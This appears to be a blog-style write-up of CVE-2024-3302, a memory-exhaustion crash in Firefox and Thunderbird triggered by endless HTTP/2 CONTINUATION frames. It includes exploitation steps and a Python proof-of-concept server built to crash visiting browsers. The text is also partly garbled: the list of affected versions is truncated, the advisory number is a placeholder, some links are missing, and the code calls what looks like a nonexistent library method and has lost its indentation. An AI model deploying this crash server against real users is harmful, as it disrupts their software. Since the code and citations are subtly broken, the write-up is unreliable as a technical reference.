---
Overview
In April 2024, a significant vulnerability was disclosed in Mozilla's Firefox, Firefox ESR, and Thunderbird products. Tracked as CVE-2024-3302, this flaw centers around the processing of HTTP/2 CONTINUATION frames. In simple terms, there was no strict limit on how many of these CONTINUATION frames could be handled by the browser. A malicious server could keep sending such frames, eventually pushing a browser or mail client into running out of memory—potentially crashing it or, at times, making it unresponsive.
Let’s break down what this means, how it works, and how attackers can exploit it.
## What Are HTTP/2 CONTINUATION Frames?
HTTP/2 introduced a new way to send multiple HTTP requests and responses over a single connection. This is much faster and more efficient than older HTTP versions.
During HTTP/2 communication, large header blocks (which are basically metadata describing the request/response) can be broken up into smaller chunks. CONTINUATION frames are used to send these chunks over the network.
Normally, the number of CONTINUATION frames is reasonable and ended automatically, but in vulnerable versions of Firefox and Thunderbird, there was no enforced upper limit.
Thunderbird _before_ 115.10
If you’re using any of these, you should update as soon as possible!
The Core Issue
Attackers can craft an HTTP/2 response with a *massive* or *never-ending* sequence of CONTINUATION frames. Since the browser does not enforce a limit, each frame consumes some memory. Given enough frames, this causes the browser’s memory usage to skyrocket—eventually leading to an Out of Memory (OOM) crash.
This can be done remotely just by making the user visit a malicious website (or open a malicious email in Thunderbird).
Exploitation Steps
1. Server Setup: The attacker operates a web server speaking HTTP/2.
2. Craft Malicious Response: When a browser makes a request, the server replies with headers that are split into an extremely long chain of CONTINUATION frames, never signaling the end of headers.
3. Browser Receives Data: Firefox/Thunderbird keeps assembling header data and allocating more and more memory.
4. Result: Eventually, the system runs out of memory. The browser (or Thunderbird) freezes or crashes.
Demonstration: Proof-of-Concept (PoC)
Below is a simplified Python snippet using h2 and h2connection to show how an HTTP/2 server might send an endless sequence of CONTINUATION frames. (For educational purposes—do not use this maliciously!)
import socket
from h2.connection import H2Connection
from h2.events import RequestReceived
# Setup a basic TCP server
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind(('...', 8443))
server_socket.listen(1)
print("Listening on port 8443...")
client_socket, addr = server_socket.accept()
conn = H2Connection()
conn.initiate_connection()
client_socket.sendall(conn.data_to_send())
while True:
data = client_socket.recv(65535)
events = conn.receive_data(data)
for event in events:
if isinstance(event, RequestReceived):
# Respond with headers, split into massive CONTINUATION frames
stream_id = event.stream_id
conn.send_headers(
stream_id=stream_id,
headers=[(':status', '200'), ('content-type', 'text/plain')],
end_stream=False, end_headers=False
)
# Now, send thousands of empty CONTINUATION frames
for _ in range(500000):
conn.send_continuation(stream_id, headers=[], end_headers=False)
client_socket.sendall(conn.data_to_send())
# Optionally end headers (but don't, to keep browser allocating)
client_socket.close()
server_socket.close()
Note: The above code needs the h2 library from Python (pip install h2) and skips SSL/TLS wrapping for brevity.
User Interaction: Visiting a malicious website or opening a crafted email
No known code execution, but it’s a low-effort crash, and annoying—especially for users on lower-memory or embedded systems.
Mozilla Security Advisory:
- Mozilla Foundation Security Advisory 2024-XX (Note: replace 'xx' with the actual advisory number, as assigned)
CVE Details Page:
Github Commit (Patch):
- Bug 188548 – Limit processed CONTINUATION frames (patch)
How To Protect Yourself
- Update immediately! Always keep your browser (and mail client) up to date. Version 125+ for Firefox and 115.10+ for ESR/Thunderbird fix the problem.
- Disable HTTP/2 (Advanced Users): You can temporarily disable HTTP/2 in Firefox about:config by setting network.http.http2.enabled to false, but this will break some modern sites.
Conclusion
CVE-2024-3302 is a textbook example of why protocol limits matter. If you're running an affected version of Firefox or Thunderbird, you're at risk of a remotely triggered memory overload. The fix is simple: update as soon as you can.
If you want to learn more, check out the official Mozilla security advisory or the code patch linked above.
Stay safe and keep your software patched!
*This post written exclusively for your insight, based on primary research and simplified for everyone’s understanding.*
Timeline
Published on: 04/16/2024 16:15:08 UTC
Last modified on: 07/03/2024 02:06:08 UTC